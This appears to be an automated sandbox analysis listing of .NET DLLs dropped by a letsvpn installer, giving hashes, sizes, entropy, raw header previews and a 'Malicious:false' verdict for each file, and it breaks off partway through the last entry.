                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17952
                                                                                                                                                                                                  Entropy (8bit):6.925806153080495
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:n6RW6eWghqWOHlLf2KQcvBZ9SbgnnYOS+ShjmM6IGBkSm:n67Aq3b2KZBZlnnYOS+ST6nkN
                                                                                                                                                                                                  MD5:6EF67383B90630472B4DBE9D61D51D9C
                                                                                                                                                                                                  SHA1:169492A2BE06CC2EA9F476B981DAB0F0F8E35243
                                                                                                                                                                                                  SHA-256:4F28221729A3093D3F3E403EB6121234D69387D902C5026B298BF3CC58074159
                                                                                                                                                                                                  SHA-512:D155F67B9602FCEF1F2EB88648BE5F472FA75E5423360DB3B041B7A512B720743971177254D7D8E8A5F0A8FFF4B4D9D862ACB3E134A1D623F66F2CA94520743B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............-... ...@....... ..............................t5....@..................................-..O....@.................. ....`......P,............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................-......H.......P .......................+......................................BSJB............v4.0.30319......l.......#~..\.......#Strings....\.......#US.`.......#GUID...p.......#Blob......................3......................................5.........c.............z...............(.....E.....................................Q.........../...........b.....b.....b...).b...1.b...9.b...A.b...I.b...Q.b...Y.b...a.b...i.b...q.b.......................#.....+.....3.....;.....C.4...K.T...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Linq.Parallel.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.960222514973397
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:ESUP9W70WhhqWOHlLf2KQcvBZ9mnLF9YS+ShjmM6IGBkSM:hUeRq3b2KZBZsIS+ST6nkT
                                                                                                                                                                                                  MD5:E0ED9475D368E11A5EBF2FEE0DB4AA8D
                                                                                                                                                                                                  SHA1:D8652BBFE2912F6A3B2FC1CD32230A7A8504C3D5
                                                                                                                                                                                                  SHA-256:02A0AA03887A2F13F6993BC1FF589167A72E9233DA9BFEA8D06F39A1F4E3E452
                                                                                                                                                                                                  SHA-512:7561AE8F0C976817C5DACE0F87ED39D35E7B3FF8DD5D7D3DB03472FB6E484B3359C715490BEED3A7E11DC67F3CE0505CB4A5256D79404300C53708BC3F1CF832
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............)... ...@....... ....................................@..................................(..O....@.................. ....`.......'............................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H.......P .......................'......................................BSJB............v4.0.30319......l.......#~..,...x...#Strings............#US.........#GUID...........#Blob......................3..................................................&.....&...p.....F.............................9.....R.................m.....V...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.1...K.Q...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Linq.Queryable.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.956007202011485
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:58yg07W0/WohqWOHlLf2KQcvBZ9gXsS+ShjmM6IGBkSs:5BHZq3b2KZBZBS+ST6nk7
                                                                                                                                                                                                  MD5:6EBBEFC03F03C1DC559F41D9C11CD702
                                                                                                                                                                                                  SHA1:0F2FA9B0BE3AAD5B36DED4481A1339D811ABAA52
                                                                                                                                                                                                  SHA-256:F90DE9000C6D747B69443B3754E1BA110AC88709A1BC27E88FBB304B63F0B019
                                                                                                                                                                                                  SHA-512:741AF8C09090A289C3D88E5B8D89E9CA6FBD54C1A6E62DCC71A6CF1F8AE40D45C322AB02EA3785BCD07BA8EC89597CE0E2CBDB16010BBBF218AFC925B831CDBC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............)... ...@....... ....................................@..................................(..O....@.................. ....`......x'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~.. ...d...#Strings............#US.........#GUID...........#Blob......................3.................................................."....."...m.....B.............................6.....O.................j.....S.......(...........................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.2...K.R...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Linq.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.926537737305858
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:Se1WmRWQhqWOHlLf2KQcvBZ9Mo+JS+ShjmM6IGBkSJ3:Sej3q3b2KZBZPwS+ST6nkc3
                                                                                                                                                                                                  MD5:69C49A0199ECD4366220BD0718C8123F
                                                                                                                                                                                                  SHA1:CCDC0B518FC549DF6DA6C8D4E9E29615EB74B773
                                                                                                                                                                                                  SHA-256:255BF1A913BED63A302FF334A49D3CDA16064E17D032883F517634A6E09CEAF1
                                                                                                                                                                                                  SHA-512:80F90E045F79915C38C8413F16A0F8A15B02F4694FB387FFEBD67A1A7A78369AD2AF6EF64232635EBA972DF8F391117B72F128703EC8F9F6BFC76A836D5B8937
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ..............................O.....@.................................p(..O....@.................. ....`......8'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H.......P ..h....................&......................................BSJB............v4.0.30319......l.......#~.. ...0...#Strings....P.......#US.T.......#GUID...d.......#Blob......................3............................................................f...........z.................y...../.....H.................c.....L.......,...........................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.(...K.H...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Management.Automation.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):366112
                                                                                                                                                                                                  Entropy (8bit):5.913155732487538
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:4A0HY8o04jatc9MCELK5h+BO2L1fsqF030f0:4A0HYnitRCOFOI1Wv
                                                                                                                                                                                                  MD5:140C261BA8A0CFC9CDF37B9B84D3A5D7
                                                                                                                                                                                                  SHA1:203FB8572956AD08EECB32217A261FE9C084D6AE
                                                                                                                                                                                                  SHA-256:BE6BDEECE5499E95B1C2CD138980171FD762D37CF3CA66807F1D556D497634CA
                                                                                                                                                                                                  SHA-512:BB754F877D0AE780F5BB1F29B966E8B8F14240304B108537319B2212F9B419656E4F75E0CA983092D69CCEC0ABF34F8B6B0A8F720A383C91D809A5CB3C9D8579
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;..........." ..0..`...........~... ........... ....................................`.................................?~..O....................h.. ...........\}..T............................................ ............... ..H............text....^... ...`.................. ..`.rsrc................b..............@..@.reloc...............f..............@..B................s~......H.......t|..h....................|........................................('...*..((...*..(#...*..*..*..*.*..(....*..(....*..(....*..(....*..*.*..(1...*..*..(....*..*..*.*..*.*..*..*..*..(....*..(....*..(....*..(....*..(....*..(....*..(....*..(....*..*..*..*..*..*..*..*.*..()...*..()...*..*.*..*.*..(....*..*..(....*..(....*..(....*..(....*..('...*....Q.*..(....*..*.*..*.*..*.*..*.*..*.*..('...*..((...*..*.*..*.*..*.*..('...*..('...*..*..*.*..*.*..*..*..*..*..*..('...*..*..*..

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Memory.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):143904
                                                                                                                                                                                                  Entropy (8bit):6.189282219926361
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:kUGrszKKLB8a9DvrJeeesIf3amN32AW/rcesL/R:nB8l3/aK32Bc
                                                                                                                                                                                                  MD5:A4C44C10DD8CF211B874DF927FC6982E
                                                                                                                                                                                                  SHA1:C6B01D97636D3D2555754D09BAA00B01029A3B49
                                                                                                                                                                                                  SHA-256:94EE25A9E39BB2CC16A21340F4E18B1D19F32DE920A9233754F4A84142122CBB
                                                                                                                                                                                                  SHA-512:0499CCF78F79E4A0D8A71F201471F17181B6C2A35048D219F7F689029FAEF9AEA71D89DCAB8E8A8CB719413D364623D1B7FE2D8FE1DC7D7A3EAA0AC3886A3A9F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6wb.........." ..0.................. ... ....... .......................`.......6....@.................................`...O.... ..@............... ....@......(................................................ ............... ..H............text........ ...................... ..`.rsrc...@.... ......................@..@.reloc.......@......................@..B........................H........,................................................................('...*>..}......}....*..{....*..{....*..{.....{....3..{.....{....((...*.*..0...........%.u....,..........(....*.*z.{....%-.&.+.o)....{....(a...*..(....zN........o*...s+...*.(....z.s,...*..(....zF(U....(O...s-...*.(....z.(V...s-...*.(....z.s....*.(....z.s/...*..(....zN........o*...s0...*.(....zrr...p(\....c.K...(O...s1...*.(....zBr...p(Y...s1...*.(....z.s2...*.(....z.(X...s3...*.(!...z.(_...s3...*.(#...z

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.Http.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):194080
                                                                                                                                                                                                  Entropy (8bit):6.134658606305299
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:aeruQlNGOhYq0AQcTvankc+8lbKta4FUPAT8xpRI454I/Kv6RpZ8dwPSgQo/yV:bW60VcTvakcXcApOXDV
                                                                                                                                                                                                  MD5:1687F3EF97F927F0ADFBE36929435735
                                                                                                                                                                                                  SHA1:037F0E044A87E6629C5157DF735F395F1295A7F5
                                                                                                                                                                                                  SHA-256:580BCDF39C8795A5A157FC5B6A5A81BD91B388FBA1215A00ACA2DC58C87846A7
                                                                                                                                                                                                  SHA-512:59776468CC0B16E851653C841C8EEEEB26BC9ECC46A94A221FE409EB0467161FDCA504115B9EC69573103BABF8623CC4C41793E5A5CD1FB5D5406D1280535AA7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0.................. ........... ....................... ............@.....................................O.......h............... ............................................................ ............... ..H............text...D.... ...................... ..`.rsrc...h...........................@..@.reloc..............................@..B........................H........$..H...........$....,...........................................0..,........ ....1.r...ps0...z.............(.....s1...*.0..l........J.2..J.o2...2.r...ps0...z..Jo3....%36.o2....JY.2*..J.Xo3.....J.Xo3...(...... ........J.XT.*...J...XT.o3...*..o2....Y./..*..o3....%3 ...Xo3......Xo3...(.... .......*.*..0..=..........J...XT..%....J...XT.~..... ...._.c.....J...XT.~......._..*....0............02...91...A2...F1...a2...f1. ....*..91...F1...aY+...AY..X+...0Y...02...91...A2...F

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.IPNetwork.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):38432
                                                                                                                                                                                                  Entropy (8bit):6.461441279464388
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:sVc1GUMB/z6XmY/iee5jq3b2KZBZqS+ST6nk8:sVcHMBm/ieWe3qKk/ma
                                                                                                                                                                                                  MD5:1E33798478F9452D30F03DAE6D1CDF19
                                                                                                                                                                                                  SHA1:B8E1560EA09E66746FFD869588E5E85E8C561713
                                                                                                                                                                                                  SHA-256:491C289BCB0634CAF386E0B175B548D0DD4C69EC44C74E31612B8A3B4B5EEDBB
                                                                                                                                                                                                  SHA-512:FCC55D7313633A896067E31CDE6BB13E0BEC48BBCD32E75384430F25985CECB51F1080C69D6724BAA6973058317019ED6653539CD89DA2D3621EDDCBDBB2F3BD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..\..........r{... ........... ..............................p.....`..................................{..O.......h............h.. ...........0z..T............................................ ............... ..H............text....[... ...\.................. ..`.rsrc...h............^..............@..@.reloc...............f..............@..B................Q{......H.......D>..l;...................y.......................................0..v.........(.......i.Y...i.Zs.........(.......o.....0....(.....3...0o....&..o ...&..Y.+......(......0o!...o ...&..Y.../..o"...*6..r...p(#...*.0............(.......i.Y...i.[.X.Zs.......i.]..-......+....b......%.Y..X....Y..-....($........o.....0....(.....3...0o....&...o ...&+1.....b...Y..bX...Y.X......($.....0o!...o ...&..Y.../..o"...*...0..d.........(.......X...i.3..+.../......+......f...X....i.Y2...i.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.NameResolution.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.948776506140675
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:m6ZWYLWZhqWOHlLf2KQcvBZ9wX74S+ShjmM6IGBkS4cI:m6l+q3b2KZBZEES+ST6nkBcI
                                                                                                                                                                                                  MD5:645261E4A9B6987F58E2DDBDE079B719
                                                                                                                                                                                                  SHA1:1F1FBCA97959753EB34EE48EBB53B9D7FBED89A4
                                                                                                                                                                                                  SHA-256:6E54116F6B216370C0B56EFF67E65C0C1FC36B9BC64EF2D7C6C99A8D522D6135
                                                                                                                                                                                                  SHA-512:12AA410EA7F9D4C36B947A2F33AB7B743BA795023D3EED547B784A94E58D8F7113C7239BCFB94EC692850DD2137409178F1E9039F2EF9CF79FE2E5E30264A953
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ..............................R.....@.................................T(..O....@.. ............... ....`.......'............................................... ............... ..H............text........ ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B.................(......H.......P ..L....................&......................................BSJB............v4.0.30319......l.......#~......0...#Strings....$.......#US.(.......#GUID...8.......#Blob......................3......................................z...............\.....0...........D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.6...K.V...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.NetworkInformation.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17952
                                                                                                                                                                                                  Entropy (8bit):6.906079947109159
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:d1W1WMQWKhqWOHlLf2KQcvBZ9WyWS+ShjmM6IGBkSn:S1Aq3b2KZBZWS+ST6nkQ
                                                                                                                                                                                                  MD5:E3A134FCE26AD9447AA9CC22217AFB46
                                                                                                                                                                                                  SHA1:16F12C16877CA2FEFFCA363BAA5478C807A6AFAD
                                                                                                                                                                                                  SHA-256:5E06A39547C752DBCB496541D7D6CD35D31ABB4C2D93017F9069CB6CA5E5B751
                                                                                                                                                                                                  SHA-512:C76EC1D0D7CB548A29CD3E79AFE5D3982C89F0B21D9A6DE2C024E11EBFACD022C8CC892552789158722D889689B6D1C8BB855024FFC78C3BF944023C171E1709
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............,... ...@....... ....................................@..................................,..O....@..@............... ....`......p+............................................... ............... ..H............text........ ...................... ..`.rsrc...@....@......................@..@.reloc.......`......................@..B.................,......H.......P .......................*......................................BSJB............v4.0.30319......l...<...#~..........#Strings....t.......#US.x.......#GUID...........#Blob......................3................................!...............E.................%.................'...........e.....~...........................................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.:...K.Z...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.Ping.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.9354694845948455
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:qdSWSKWxhqWOHlLf2KQcvBZ9WI1HS+ShjmM6IGBkS74:sOjq3b2KZBZsqS+ST6nkr
                                                                                                                                                                                                  MD5:50943D04E6FDBA897F3115A5BEDC4CCD
                                                                                                                                                                                                  SHA1:96372B2760B0E85EB076CE0235381B04BDAD9045
                                                                                                                                                                                                  SHA-256:E4D55BB6B22194E1A1688D53B2F96593B93F5D8DF490AD6EFF7D416D2023B4D2
                                                                                                                                                                                                  SHA-512:EBEB12EB99049FA291160B745250B7105F21941A45FA3206D51F67F78F799EF64D2363A28AC4C5C4A6C0602E668BF0A1E5BE5AE745B1406B986A252AF3243CF9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ..............................t.....@..................................(..O....@.................. ....`......X'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~.. ...L...#Strings....l.......#US.p.......#GUID...........#Blob......................3......................................................\.....0...........D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.,...K.L...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.Primitives.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17952
                                                                                                                                                                                                  Entropy (8bit):6.864133838979022
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:UJEYA2WkIWhhqWOHlLf2KQcvBZ9pZbS+ShjmM6IGBkSY:UyYA8Zq3b2KZBZhS+ST6nkL
                                                                                                                                                                                                  MD5:2E9048F3BD9B2666999D08460F6270B8
                                                                                                                                                                                                  SHA1:09F1DDF20F750D87161A39342E0597AD417D812D
                                                                                                                                                                                                  SHA-256:43E2003D5DBAB917467CFA17939CB4F499B7DC2A013F2E91915295A393382B1F
                                                                                                                                                                                                  SHA-512:053C7390459C2CE7B103402DA54A87B71B9FFA6B73A55D3CA7FF7BD420D410AB075C1635B4794E31564EA28B275E144C8F33EE13750ECAE7A06B5D549BEE4479
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0.............r,... ...@....... ....................................@................................. ,..O....@.................. ....`.......*............................................... ............... ..H............text...x.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................T,......H.......P ......................h*......................................BSJB............v4.0.30319......l.......#~..|...x...#Strings............#US.........#GUID...........#Blob......................3......................................$.........N.U.....U.....-...u.................0...........n.........................>.......................'.....'.....'...).'...1.'...9.'...A.'...I.'...Q.'...Y.'...a.'...i.'...q.'.......................#.....+.....3.....;.....C.2...K.R...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.Requests.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.9801791052871645
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:ljJGWe4WIhqWOHlLf2KQcvBZ93vQS+ShjmM6IGBkSaDO:TmOq3b2KZBZWS+ST6nk1K
                                                                                                                                                                                                  MD5:353F86DA020852C31535C10570730236
                                                                                                                                                                                                  SHA1:F323622AB32B5E2C680C774B5ECD37F6A9831C67
                                                                                                                                                                                                  SHA-256:09D926F8783774091E8E16CDE50E1C1A02EB257C6551BE6DE826B49E53905B13
                                                                                                                                                                                                  SHA-512:11F5770EDDB93C78F9EAFA76033E8438B96220B8ACBA95BAD7CCCE478961AD91AB4E4BD7878C852E2817059FAB457C34995C410F40203777A77B05D8F42BC81E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............)... ...@....... ....................................@.................................0)..O....@.................. ....`.......'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................d)......H.......P ..(...................x'......................................BSJB............v4.0.30319......l.......#~..d.......#Strings............#US.........#GUID...........#Blob......................3..................................................4...~.4...R.!...T.....f.................e...........4.....}...........O.....8...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.0...K.P...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.Security.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.899550672496046
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:rxdW1w3WesW9hqWOHlLf2KQcvBZ9q7S+ShjmM6IGBkSJ:ru1wxNq3b2KZBZES+ST6nkS
                                                                                                                                                                                                  MD5:D231E241020D93712DE8A195A6A40000
                                                                                                                                                                                                  SHA1:BC6884E64295EA65467C89748EB01563E8D53FA1
                                                                                                                                                                                                  SHA-256:97ECEE66FF62BBF5ECEE95876E18CF9389258A3CF97FA8EBB8381CDE14BFA829
                                                                                                                                                                                                  SHA-512:11652F0CC85136AA9AAFBA7E0611E6196AD8E912604E5A40A4323B413A70C4943F67E90E5B6B8578A7710FAB9EBEFB412A93CF8E0919810D4198FEBECAB76D2C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0.............~*... ...@....... ....................................@.................................,*..O....@.................. ....`.......(............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................`*......H.......P ..$...................t(......................................BSJB............v4.0.30319......l...$...#~......t...#Strings............#US.........#GUID...........#Blob......................3......................................................\.....0...........D.<.....<.....<...C.<.....<.....<...[.<...x.<...-.......<.................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.0...K.P...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.Sockets.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):26144
                                                                                                                                                                                                  Entropy (8bit):6.6921368213375345
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:Hyp12Bhkg3qnV/sErq3b2KZBZgS+ST6nkUu:w12zkg3qV/sE23qKW/mR
                                                                                                                                                                                                  MD5:98DB5D03B1515001435A0FBA8BA52123
                                                                                                                                                                                                  SHA1:646BC0EF11273748ACA1682F036862391C1571F5
                                                                                                                                                                                                  SHA-256:5489D1EE790F9E818BB4DB0042DD105615386B10AEE5ACCE357F32B48BBBAFDB
                                                                                                                                                                                                  SHA-512:75FC8940B4423F9455D18F039D65E1858C3F0A5950B6303640220B15DBBE390479007953ADA5C48BED0236D9DFBF04BE47AE2AE2FD6BA0F27846BD45F4C2B7F7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..*...........I... ...`....... ...................................@.................................gI..O....`...............8.. ............H............................................... ............... ..H............text....)... ...*.................. ..`.rsrc........`.......,..............@..@.reloc...............6..............@..B.................I......H.......H(... ..................HH.......................................0..J.......(....~....%-.&~..........s....%.....~....%-.&~..........s....%......o....*...0..L.......(....~....%-.&~..........s....%.....~....%-.&~..........s....%........o...+*.0..K.......(....~....%-.&~..........s....%.....~....%-.&~..........s....%.......o...+*..0..L.......(....~....%-.&~..........s....%.....~....%-.&~..........s....%........o...+*.0..L.......(....~....%-.&~..........s....%.....~....%-.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.WebHeaderCollection.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.96273202505333
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:vHPAW1bWXhqWOHlLf2KQcvBZ9doS+ShjmM6IGBkSuiJl:nrAq3b2KZBZES+ST6nkcl
                                                                                                                                                                                                  MD5:F672FB804EA4BAB0D33ACA3113EFBB80
                                                                                                                                                                                                  SHA1:EF9535A08CB9F9ECF79064BBA08A9DD1CFE544DE
                                                                                                                                                                                                  SHA-256:E8B42014F94A851E2E66AB964E8D96FDCC6E53492F79939C5E8392D7023630A2
